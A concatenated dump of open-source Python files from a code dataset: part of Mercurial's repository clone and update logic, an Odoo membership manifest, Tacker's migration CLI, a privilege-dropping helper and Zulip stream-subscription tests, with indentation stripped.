# clone all bookmarks except divergent ones
destrepo = destpeer.local()
if destrepo and srcpeer.capable("pushkey"):
rb = srcpeer.listkeys('bookmarks')
marks = destrepo._bookmarks
for k, n in rb.iteritems():
try:
m = destrepo.lookup(n)
marks[k] = m
except error.RepoLookupError:
pass
if rb:
marks.write()
elif srcrepo and destpeer.capable("pushkey"):
for k, n in srcrepo._bookmarks.iteritems():
destpeer.pushkey('bookmarks', k, '', hex(n))
if destrepo:
fp = destrepo.opener("hgrc", "w", text=True)
fp.write("[paths]\n")
u = util.url(abspath)
u.passwd = None
defaulturl = str(u)
fp.write("default = %s\n" % defaulturl)
fp.close()
destrepo.ui.setconfig('paths', 'default', defaulturl)
if update:
if update is not True:
checkout = srcpeer.lookup(update)
uprev = None
status = None
if checkout is not None:
try:
uprev = destrepo.lookup(checkout)
except error.RepoLookupError:
pass
if uprev is None:
try:
uprev = destrepo._bookmarks['@']
update = '@'
bn = destrepo[uprev].branch()
if bn == 'default':
status = _("updating to bookmark @\n")
else:
status = _("updating to bookmark @ on branch %s\n"
% bn)
except KeyError:
try:
uprev = destrepo.branchtip('default')
except error.RepoLookupError:
uprev = destrepo.lookup('tip')
if not status:
bn = destrepo[uprev].branch()
status = _("updating to branch %s\n") % bn
destrepo.ui.status(status)
_update(destrepo, uprev)
if update in destrepo._bookmarks:
bookmarks.setcurrent(destrepo, update)
return srcpeer, destpeer
finally:
release(srclock, destlock)
if cleandir is not None:
shutil.rmtree(cleandir, True)
if srcpeer is not None:
srcpeer.close()
def _showstats(repo, stats):
repo.ui.status(_("%d files updated, %d files merged, "
"%d files removed, %d files unresolved\n") % stats)
def updaterepo(repo, node, overwrite):
"""Update the working directory to node.
When overwrite is set, changes are clobbered, merged else
returns stats (see pydoc mercurial.merge.applyupdates)"""
return mergemod.update(repo, node, False, overwrite, None)
def update(repo, node):
"""update the working directory to node, merging linear changes"""
stats = updaterepo(repo, node, False)
_showstats(repo, stats)
if stats[3]:
repo.ui.status(_("use 'hg resolve' to retry unresolved file merges\n"))
return stats[3] > 0
# naming conflict in clone()
_update = update
def clean(repo, node, show_stats=True):
"""forcibly switch the working directory to node, clobbering changes"""
stats = updaterepo(repo, node, True)
if show_stats:
_showstats(repo, stats)
return stats[3] > 0
def merge(repo, node, force=None, remind=True):
"""Branch merge with node, resolving changes. Return true if any
unresolved conflicts."""
stats = mergemod.update(repo, node, True, force, False)
_showstats(repo, stats)
if stats[3]:
repo.ui.status(_("use 'hg resolve' to retry unresolved file merges "
"or 'hg update -C .' to abandon\n"))
elif remind:
repo.ui.status(_("(branch merge, don't forget to commit)\n"))
return stats[3] > 0
def _incoming(displaychlist, subreporecurse, ui, repo, source,
opts, buffered=False):
"""
Helper for incoming / gincoming.
displaychlist gets called with
(remoterepo, incomingchangesetlist, displayer) parameters,
and is supposed to contain only code that can't be unified.
"""
source, branches = parseurl(ui.expandpath(source), opts.get('branch'))
other = peer(repo, opts, source)
ui.status(_('comparing with %s\n') % util.hidepassword(source))
revs, checkout = addbranchrevs(repo, other, branches, opts.get('rev'))
if revs:
revs = [other.lookup(rev) for rev in revs]
other, chlist, cleanupfn = bundlerepo.getremotechanges(ui, repo, other,
revs, opts["bundle"], opts["force"])
try:
if not chlist:
ui.status(_("no changes found\n"))
return subreporecurse()
displayer = cmdutil.show_changeset(ui, other, opts, buffered)
# XXX once graphlog extension makes it into core,
# should be replaced by a if graph/else
displaychlist(other, chlist, displayer)
displayer.close()
finally:
cleanupfn()
subreporecurse()
return 0 # exit code is zero since we found incoming changes
def incoming(ui, repo, source, opts):
def subreporecurse():
ret = 1
if opts.get('subrepos'):
ctx = repo[None]
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
ret = min(ret, sub.incoming(ui, source, opts))
return ret
def display(other, chlist, displayer):
limit = cmdutil.loglimit(opts)
if opts.get('newest_first'):
chlist.reverse()
count = 0
for n in chlist:
if limit is not None and count >= limit:
break
parents = [p for p in other.changelog.parents(n) if p != nullid]
if opts.get('no_merges') and len(parents) == 2:
continue
count += 1
displayer.show(other[n])
return _incoming(display, subreporecurse, ui, repo, source, opts)
def _outgoing(ui, repo, dest, opts):
dest = ui.expandpath(dest or 'default-push', dest or 'default')
dest, branches = parseurl(dest, opts.get('branch'))
ui.status(_('comparing with %s\n') % util.hidepassword(dest))
revs, checkout = addbranchrevs(repo, repo, branches, opts.get('rev'))
if revs:
revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
other = peer(repo, opts, dest)
outgoing = discovery.findcommonoutgoing(repo.unfiltered(), other, revs,
force=opts.get('force'))
o = outgoing.missing
if not o:
scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
return None
return o
def outgoing(ui, repo, dest, opts):
def recurse():
ret = 1
if opts.get('subrepos'):
ctx = repo[None]
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
ret = min(ret, sub.outgoing(ui, dest, opts))
return ret
limit = cmdutil.loglimit(opts)
o = _outgoing(ui, repo, dest, opts)
if o is None:
return recurse()
if opts.get('newest_first'):
o.reverse()
displayer = cmdutil.show_changeset(ui, repo, opts)
count = 0
for n in o:
if limit is not None and count >= limit:
break
parents = [p for p in repo.changelog.parents(n) if p != nullid]
if opts.get('no_merges') and len(parents) == 2:
continue
count += 1
displayer.show(repo[n])
displayer.close()
recurse()
return 0 # exit code is zero since we found outgoing changes
def revert(repo, node, choose):
"""revert changes to revision in node without updating dirstate"""
return mergemod.update(repo, node, False, True, choose)[3] > 0
def verify(repo):
"""verify the consistency of a repository"""
return verifymod.verify(repo)
def remoteui(src, opts):
'build a remote ui from ui or repo and opts'
if util.safehasattr(src, 'baseui'): # looks like a repository
dst = src.baseui.copy() # drop repo-specific config
src = src.ui # copy target options from repo
else: # assume it's a global ui object
dst = src.copy() # keep all global options
# copy ssh-specific options
for o in 'ssh', 'remotecmd':
v = opts.get(o) or src.config('ui', o)
if v:
dst.setconfig("ui", o, v)
# copy bundle-specific options
r = src.config('bundle', 'mainreporoot')
if r:
dst.setconfig('bundle', 'mainreporoot', r)
# copy selected local settings to the remote ui
for sect in ('auth', 'hostfingerprints', 'http_proxy'):
for key, val in src.configitems(sect):
dst.setconfig(sect, key, val)
v = src.config('web', 'cacerts')
if v:
dst.setconfig('web', 'cacerts', util.expandpath(v))
return dst
| apache-2.0 |
NeovaHealth/odoo | addons/membership/__openerp__.py | 197 | 2207 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Membership Management',
'version': '0.1',
'category': 'Association',
'description': """
This module allows you to manage all operations for managing memberships.
=========================================================================
It supports different kind of members:
--------------------------------------
* Free member
* Associated member (e.g.: a group subscribes to a membership for all subsidiaries)
* Paid members
* Special member prices
It is integrated with sales and accounting to allow you to automatically
invoice and send propositions for membership renewal.
""",
'author': 'OpenERP SA',
'depends': ['base', 'product', 'account'],
'data': [
'security/ir.model.access.csv',
'wizard/membership_invoice_view.xml',
'membership_data.xml',
'membership_view.xml',
'report/report_membership_view.xml',
],
'demo': [
'membership_demo.xml',
'membership_demo.yml'
],
'website': 'https://www.odoo.com/page/community-builder',
'test': ['test/test_membership.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
stackforge/tacker | tacker/db/migration/cli.py | 2 | 6050 | # Copyright 2012 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from alembic import command as alembic_command
from alembic import config as alembic_config
from alembic import script as alembic_script
from alembic import util as alembic_util
from oslo_config import cfg
from tacker._i18n import _
from tacker.db.migration.models import head # noqa
from tacker.db.migration import purge_tables
HEAD_FILENAME = 'HEAD'
_db_opts = [
cfg.StrOpt('connection',
deprecated_name='sql_connection',
default='',
secret=True,
help=_('URL to database')),
cfg.StrOpt('engine',
default='',
help=_('Database engine')),
]
CONF = cfg.ConfigOpts()
CONF.register_cli_opts(_db_opts, 'database')
def do_alembic_command(config, cmd, *args, **kwargs):
try:
getattr(alembic_command, cmd)(config, *args, **kwargs)
except alembic_util.CommandError as e:
alembic_util.err(str(e))
def do_check_migration(config, cmd):
do_alembic_command(config, 'branches')
validate_head_file(config)
def do_upgrade(config, cmd):
if not CONF.command.revision and not CONF.command.delta:
raise SystemExit(_('You must provide a revision or relative delta'))
revision = CONF.command.revision
if CONF.command.delta:
revision = '+%s' % str(CONF.command.delta)
else:
revision = CONF.command.revision
do_alembic_command(config, cmd, revision, sql=CONF.command.sql)
def do_stamp(config, cmd):
do_alembic_command(config, cmd,
CONF.command.revision,
sql=CONF.command.sql)
def do_revision(config, cmd):
do_alembic_command(config, cmd,
message=CONF.command.message,
autogenerate=CONF.command.autogenerate,
sql=CONF.command.sql)
update_head_file(config)
def validate_head_file(config):
script = alembic_script.ScriptDirectory.from_config(config)
if len(script.get_heads()) > 1:
alembic_util.err(_('Timeline branches unable to generate timeline'))
head_path = os.path.join(str(script.versions), HEAD_FILENAME)
if (os.path.isfile(head_path) and
open(head_path).read().strip() == script.get_current_head()):
return
else:
alembic_util.err(_('HEAD file does not match migration timeline head'))
def update_head_file(config):
script = alembic_script.ScriptDirectory.from_config(config)
if len(script.get_heads()) > 1:
alembic_util.err(_('Timeline branches unable to generate timeline'))
head_path = os.path.join(str(script.versions), HEAD_FILENAME)
with open(head_path, 'w+') as f:
f.write(script.get_current_head())
def purge_deleted(config, cmd):
"""Remove database records that have been previously soft deleted."""
purge_tables.purge_deleted(config.tacker_config,
CONF.command.resource,
CONF.command.age,
CONF.command.granularity)
def add_command_parsers(subparsers):
for name in ['current', 'history', 'branches']:
parser = subparsers.add_parser(name)
parser.set_defaults(func=do_alembic_command)
parser = subparsers.add_parser('check_migration')
parser.set_defaults(func=do_check_migration)
parser = subparsers.add_parser('upgrade')
parser.add_argument('--delta', type=int)
parser.add_argument('--sql', action='store_true')
parser.add_argument('revision', nargs='?')
parser.set_defaults(func=do_upgrade)
parser = subparsers.add_parser('stamp')
parser.add_argument('--sql', action='store_true')
parser.add_argument('revision')
parser.set_defaults(func=do_stamp)
parser = subparsers.add_parser('revision')
parser.add_argument('-m', '--message')
parser.add_argument('--autogenerate', action='store_true')
parser.add_argument('--sql', action='store_true')
parser.set_defaults(func=do_revision)
parser = subparsers.add_parser('purge_deleted')
parser.set_defaults(func=purge_deleted)
# positional parameter
parser.add_argument(
'resource',
choices=['all', 'events', 'vnf', 'vnfd', 'vims'],
help=_('Resource name for which deleted entries are to be purged.'))
# optional parameter, can be skipped. default='90'
parser.add_argument('-a', '--age', nargs='?', default='90',
help=_('How long to preserve deleted data, '
'defaults to 90'))
# optional parameter, can be skipped. default='days'
parser.add_argument(
'-g', '--granularity', default='days',
choices=['days', 'hours', 'minutes', 'seconds'],
help=_('Granularity to use for age argument, defaults to days.'))
command_opt = cfg.SubCommandOpt('command',
title='Command',
help=_('Available commands'),
handler=add_command_parsers)
CONF.register_cli_opt(command_opt)
def main():
config = alembic_config.Config(
os.path.join(os.path.dirname(__file__), 'alembic.ini')
)
config.set_main_option('script_location',
'tacker.db.migration:alembic_migrations')
# attach the Tacker conf to the Alembic conf
config.tacker_config = CONF
CONF()
# TODO(gongysh) enable logging
CONF.command.func(config, CONF.command.name)
| apache-2.0 |
tumi8/sKnock | common/modules/Platform/LinuxUtils.py | 1 | 1054 | # Copyright (C) 2015-2016 Daniel Sel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, os, pwd, grp
LOG = logging.getLogger(__name__)
def dropPrivileges():
user = pwd.getpwnam('nobody')
group = grp.getgrnam('nobody')
os.setgroups([group.gr_gid])
os.setgid(group.gr_gid)
os.setuid(user.pw_uid)
LOG.debug("Dropped root privileges, now running as \'nobody\'")
| gpl-3.0 |
fw1121/zulip | zerver/test_subs.py | 113 | 63624 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from zerver.lib import cache
from zerver.lib.test_helpers import (
AuthedTestCase, queries_captured, stub, tornado_redirected_to_list
)
from zerver.decorator import (
JsonableError
)
from zerver.lib.test_runner import (
slow
)
from zerver.models import (
get_display_recipient, Message, Realm, Recipient, Stream, Subscription,
UserProfile,
)
from zerver.lib.actions import (
create_stream_if_needed, do_add_default_stream, do_add_subscription,
do_change_is_admin, do_remove_default_stream, gather_subscriptions,
get_default_streams_for_realm, get_realm, get_stream,
get_user_profile_by_email, set_default_streams,
)
import random
import ujson
import urllib
class StreamAdminTest(AuthedTestCase):
def test_make_stream_public(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'private_stream', invite_only=True)
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'private_stream'
}
result = self.client.post("/json/make_stream_public", params)
self.assert_json_error(result, 'You are not invited to this stream.')
do_add_subscription(user_profile, stream)
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'private_stream'
}
result = self.client.post("/json/make_stream_public", params)
self.assert_json_success(result)
stream = Stream.objects.get(name='private_stream', realm=realm)
self.assertFalse(stream.invite_only)
def test_make_stream_private(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'public_stream')
do_change_is_admin(user_profile, True)
params = {
'stream_name': 'public_stream'
}
result = self.client.post("/json/make_stream_private", params)
self.assert_json_success(result)
stream = Stream.objects.get(name='public_stream', realm=realm)
self.assertTrue(stream.invite_only)
def test_deactivate_stream_backend(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'new_stream')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
result = self.client.delete('/json/streams/new_stream')
self.assert_json_success(result)
subscription_exists = Subscription.objects.filter(
user_profile=user_profile,
recipient__type_id=stream.id,
recipient__type=Recipient.STREAM,
active=True,
).exists()
self.assertFalse(subscription_exists)
def test_deactivate_stream_backend_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'new_stream')
do_add_subscription(user_profile, stream, no_log=True)
result = self.client.delete('/json/streams/new_stream')
self.assert_json_error(result, 'Must be a realm administrator')
def test_rename_stream(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
events = []
with tornado_redirected_to_list(events):
result = self.client.post('/json/rename_stream?old_name=stream_name1&new_name=stream_name2')
self.assert_json_success(result)
event = events[1]['event']
self.assertEqual(event, dict(
op='update',
type='stream',
property='name',
value='stream_name2',
name='stream_name1'
))
users = events[1]['users']
self.assertEqual(users, [user_profile.id])
stream_name1_exists = Stream.objects.filter(
name='stream_name1',
realm=realm,
).exists()
self.assertFalse(stream_name1_exists)
stream_name2_exists = Stream.objects.filter(
name='stream_name2',
realm=realm,
).exists()
self.assertTrue(stream_name2_exists)
def test_rename_stream_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
result = self.client.post('/json/rename_stream?old_name=stream_name1&new_name=stream_name2')
self.assert_json_error(result, 'Must be a realm administrator')
def test_change_stream_description(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
events = []
with tornado_redirected_to_list(events):
result = self.client_patch('/json/streams/stream_name1',
{'description': ujson.dumps('Test description')})
self.assert_json_success(result)
event = events[0]['event']
self.assertEqual(event, dict(
op='update',
type='stream',
property='description',
value='Test description',
name='stream_name1'
))
users = events[0]['users']
self.assertEqual(users, [user_profile.id])
stream = Stream.objects.get(
name='stream_name1',
realm=realm,
)
self.assertEqual('Test description', stream.description)
def test_change_stream_description_requires_realm_admin(self):
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
stream, _ = create_stream_if_needed(realm, 'stream_name1')
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, False)
result = self.client_patch('/json/streams/stream_name1',
{'description': ujson.dumps('Test description')})
self.assert_json_error(result, 'Must be a realm administrator')
def set_up_stream_for_deletion(self, stream_name, invite_only=False,
subscribed=True):
"""
Create a stream for deletion by an administrator.
"""
email = 'hamlet@zulip.com'
self.login(email)
user_profile = get_user_profile_by_email(email)
stream, _ = create_stream_if_needed(user_profile.realm, stream_name,
invite_only=invite_only)
# For testing deleting streams you aren't on.
if subscribed:
do_add_subscription(user_profile, stream, no_log=True)
do_change_is_admin(user_profile, True)
return stream
def delete_stream(self, stream, subscribed=True):
"""
Delete the stream and assess the result.
"""
active_name = stream.name
events = []
with tornado_redirected_to_list(events):
result = self.client.delete('/json/streams/' + active_name)
self.assert_json_success(result)
deletion_events = [e['event'] for e in events if e['event']['type'] == 'subscription']
if subscribed:
self.assertEqual(deletion_events[0], dict(
op='remove',
type='subscription',
subscriptions=[{'name': active_name, 'stream_id': stream.id}]
))
else:
# You could delete the stream, but you weren't on it so you don't
# receive an unsubscription event.
self.assertEqual(deletion_events, [])
with self.assertRaises(Stream.DoesNotExist):
Stream.objects.get(realm=get_realm("zulip.com"), name=active_name)
# A deleted stream's name is changed, is deactivated, is invite-only,
# and has no subscribers.
deactivated_stream_name = "!DEACTIVATED:" + active_name
deactivated_stream = Stream.objects.get(name=deactivated_stream_name)
self.assertTrue(deactivated_stream.deactivated)
self.assertTrue(deactivated_stream.invite_only)
self.assertEqual(deactivated_stream.name, deactivated_stream_name)
subscribers = self.users_subscribed_to_stream(
deactivated_stream_name, "zulip.com")
self.assertEqual(subscribers, [])
# It doesn't show up in the list of public streams anymore.
result = self.client.post("/json/get_public_streams")
public_streams = [s["name"] for s in ujson.loads(result.content)["streams"]]
self.assertNotIn(active_name, public_streams)
self.assertNotIn(deactivated_stream_name, public_streams)
# Even if you could guess the new name, you can't subscribe to it.
result = self.client.post(
"/json/subscriptions/add",
{"subscriptions": ujson.dumps([{"name": deactivated_stream_name}])})
self.assert_json_error(
result, "Unable to access stream (%s)." % (deactivated_stream_name,))
def test_delete_public_stream(self):
"""
When an administrator deletes a public stream, that stream is not
visible to users at all anymore.
"""
stream = self.set_up_stream_for_deletion("newstream")
self.delete_stream(stream)
def test_delete_private_stream(self):
"""
Administrators can delete private streams they are on.
"""
stream = self.set_up_stream_for_deletion("newstream", invite_only=True)
self.delete_stream(stream)
def test_delete_streams_youre_not_on(self):
"""
Administrators can delete public streams they aren't on, but cannot
delete private streams they aren't on.
"""
pub_stream = self.set_up_stream_for_deletion(
"pubstream", subscribed=False)
self.delete_stream(pub_stream, subscribed=False)
priv_stream = self.set_up_stream_for_deletion(
"privstream", subscribed=False, invite_only=True)
result = self.client.delete('/json/streams/' + priv_stream.name)
self.assert_json_error(
result, "Cannot administer invite-only streams this way")
def attempt_unsubscribe_of_principal(self, is_admin=False, is_subbed=True,
invite_only=False, other_user_subbed=True):
# Set up the main user, who is in most cases an admin.
email = "hamlet@zulip.com"
self.login(email)
user_profile = get_user_profile_by_email(email)
realm = user_profile.realm
if is_admin:
do_change_is_admin(user_profile, True)
# Set up the stream.
stream_name = u"hümbüǵ"
stream, _ = create_stream_if_needed(realm, stream_name,
invite_only=invite_only)
# Set up the principal to be unsubscribed.
other_email = "cordelia@zulip.com"
other_user_profile = get_user_profile_by_email(other_email)
# Subscribe the admin and/or principal as specified in the flags.
if is_subbed:
do_add_subscription(user_profile, stream, no_log=True)
if other_user_subbed:
do_add_subscription(other_user_profile, stream, no_log=True)
result = self.client.post(
"/json/subscriptions/remove",
{"subscriptions": ujson.dumps([stream.name]),
"principals": ujson.dumps([other_email])})
# If the removal succeeded, then assert that Cordelia is no longer subscribed.
if result.status_code not in [400]:
subbed_users = self.users_subscribed_to_stream(stream_name, other_user_profile.realm.domain)
self.assertNotIn(other_user_profile, subbed_users)
return result
def test_cant_remove_others_from_stream(self):
"""
If you're not an admin, you can't remove other people from streams.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=False, is_subbed=True, invite_only=False,
other_user_subbed=True)
self.assert_json_error(
result, "This action requires administrative rights")
def test_admin_remove_others_from_public_stream(self):
"""
If you're an admin, you can remove people from public streams, even
those you aren't on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=True, invite_only=False,
other_user_subbed=True)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 1)
self.assertEqual(len(json["not_subscribed"]), 0)
def test_admin_remove_others_from_subbed_private_stream(self):
"""
If you're an admin, you can remove other people from private streams you
are on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=True, invite_only=True,
other_user_subbed=True)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 1)
self.assertEqual(len(json["not_subscribed"]), 0)
def test_admin_remove_others_from_unsubbed_private_stream(self):
"""
Even if you're an admin, you can't remove people from private
streams you aren't on.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=False, invite_only=True,
other_user_subbed=True)
self.assert_json_error(
result, "Cannot administer invite-only streams this way")
def test_remove_already_not_subbed(self):
"""
Trying to unsubscribe someone who already isn't subscribed to a stream
fails gracefully.
"""
result = self.attempt_unsubscribe_of_principal(
is_admin=True, is_subbed=False, invite_only=False,
other_user_subbed=False)
json = self.assert_json_success(result)
self.assertEqual(len(json["removed"]), 0)
self.assertEqual(len(json["not_subscribed"]), 1)
def test_remove_invalid_user(self):
"""
Trying to unsubscribe an invalid user from a stream fails gracefully.
"""
admin_email = "hamlet@zulip.com"
self.login(admin_email)
user_profile = get_user_profile_by_email(admin_email)
do_change_is_admin(user_profile, True)
realm = user_profile.realm
stream_name = u"hümbüǵ"
stream, _ = create_stream_if_needed(realm, stream_name)
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps([stream.name]),
"principals": ujson.dumps(["baduser@zulip.com"])})
self.assert_json_error(
result,
"User not authorized to execute queries on behalf of 'baduser@zulip.com'")
class DefaultStreamTest(AuthedTestCase):
def get_default_stream_names(self, realm):
streams = get_default_streams_for_realm(realm)
stream_names = [s.name for s in streams]
return set(stream_names)
def test_set_default_streams(self):
realm = Realm.objects.get(domain="zulip.com")
stream_names = ['apple', 'banana', 'Carrot Cake']
expected_names = stream_names + ['zulip']
set_default_streams(realm, stream_names)
stream_names = self.get_default_stream_names(realm)
self.assertEqual(stream_names, set(expected_names))
def test_add_and_remove_default_stream(self):
realm = Realm.objects.get(domain="zulip.com")
orig_stream_names = self.get_default_stream_names(realm)
do_add_default_stream(realm, 'Added Stream')
new_stream_names = self.get_default_stream_names(realm)
added_stream_names = new_stream_names - orig_stream_names
self.assertEqual(added_stream_names, set(['Added Stream']))
# idempotentcy--2nd call to add_default_stream should be a noop
do_add_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), new_stream_names)
# start removing
do_remove_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), orig_stream_names)
# idempotentcy--2nd call to remove_default_stream should be a noop
do_remove_default_stream(realm, 'Added Stream')
self.assertEqual(self.get_default_stream_names(realm), orig_stream_names)
def test_api_calls(self):
self.login("hamlet@zulip.com")
user_profile = get_user_profile_by_email('hamlet@zulip.com')
do_change_is_admin(user_profile, True)
stream_name = 'stream ADDED via api'
result = self.client_patch('/json/default_streams', dict(stream_name=stream_name))
self.assert_json_success(result)
self.assertTrue(stream_name in self.get_default_stream_names(user_profile.realm))
# and remove it
result = self.client_delete('/json/default_streams', dict(stream_name=stream_name))
self.assert_json_success(result)
self.assertFalse(stream_name in self.get_default_stream_names(user_profile.realm))
class SubscriptionPropertiesTest(AuthedTestCase):
def test_set_stream_color(self):
"""
A POST request to /json/subscriptions/property with stream_name and
color data sets the stream color, and for that stream only.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
old_subs, _ = gather_subscriptions(get_user_profile_by_email(test_email))
sub = old_subs[0]
stream_name = sub['name']
new_color = "#ffffff" # TODO: ensure that this is different from old_color
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"stream": stream_name,
"value": "#ffffff"}])})
self.assert_json_success(result)
new_subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
found_sub = None
for sub in new_subs:
if sub['name'] == stream_name:
found_sub = sub
break
self.assertIsNotNone(found_sub)
self.assertEqual(found_sub['color'], new_color)
new_subs.remove(found_sub)
for sub in old_subs:
if sub['name'] == stream_name:
found_sub = sub
break
old_subs.remove(found_sub)
self.assertEqual(old_subs, new_subs)
def test_set_color_missing_stream_name(self):
"""
Updating the color property requires a `stream` key.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"value": "#ffffff"}])})
self.assert_json_error(
result, "stream key is missing from subscription_data[0]")
def test_set_color_missing_color(self):
"""
Updating the color property requires a color.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "color",
"stream": subs[0]["name"]}])})
self.assert_json_error(
result, "value key is missing from subscription_data[0]")
def test_set_invalid_property(self):
"""
Trying to set an invalid property returns a JSON error.
"""
test_email = "hamlet@zulip.com"
self.login(test_email)
subs = gather_subscriptions(get_user_profile_by_email(test_email))[0]
result = self.client.post(
"/json/subscriptions/property",
{"subscription_data": ujson.dumps([{"property": "bad",
"value": "bad",
"stream": subs[0]["name"]}])})
self.assert_json_error(result,
"Unknown subscription property: bad")
class SubscriptionRestApiTest(AuthedTestCase):
def test_basic_add_delete(self):
email = 'hamlet@zulip.com'
self.login(email)
# add
request = {
'add': ujson.dumps([{'name': 'my_test_stream_1'}])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_success(result)
streams = self.get_streams(email)
self.assertTrue('my_test_stream_1' in streams)
# now delete the same stream
request = {
'delete': ujson.dumps(['my_test_stream_1'])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_success(result)
streams = self.get_streams(email)
self.assertTrue('my_test_stream_1' not in streams)
def test_bad_add_parameters(self):
email = 'hamlet@zulip.com'
self.login(email)
def check_for_error(val, expected_message):
request = {
'add': ujson.dumps(val)
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, expected_message)
check_for_error(['foo'], 'add[0] is not a dict')
check_for_error([{'bogus': 'foo'}], 'name key is missing from add[0]')
check_for_error([{'name': {}}], 'add[0]["name"] is not a string')
def test_bad_principals(self):
email = 'hamlet@zulip.com'
self.login(email)
request = {
'add': ujson.dumps([{'name': 'my_new_stream'}]),
'principals': ujson.dumps([{}]),
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, 'principals[0] is not a string')
def test_bad_delete_parameters(self):
email = 'hamlet@zulip.com'
self.login(email)
request = {
'delete': ujson.dumps([{'name': 'my_test_stream_1'}])
}
result = self.client_patch(
"/api/v1/users/me/subscriptions",
request,
**self.api_auth(email)
)
self.assert_json_error(result, "delete[0] is not a string")
class SubscriptionAPITest(AuthedTestCase):
def setUp(self):
"""
All tests will be logged in as hamlet. Also save various useful values
as attributes that tests can access.
"""
self.test_email = "hamlet@zulip.com"
self.login(self.test_email)
self.user_profile = get_user_profile_by_email(self.test_email)
self.realm = self.user_profile.realm
self.streams = self.get_streams(self.test_email)
def make_random_stream_names(self, existing_stream_names):
"""
Helper function to make up random stream names. It takes
existing_stream_names and randomly appends a digit to the end of each,
but avoids names that appear in the list names_to_avoid.
"""
random_streams = []
all_stream_names = [stream.name for stream in Stream.objects.filter(realm=self.realm)]
for stream in existing_stream_names:
random_stream = stream + str(random.randint(0, 9))
if not random_stream in all_stream_names:
random_streams.append(random_stream)
return random_streams
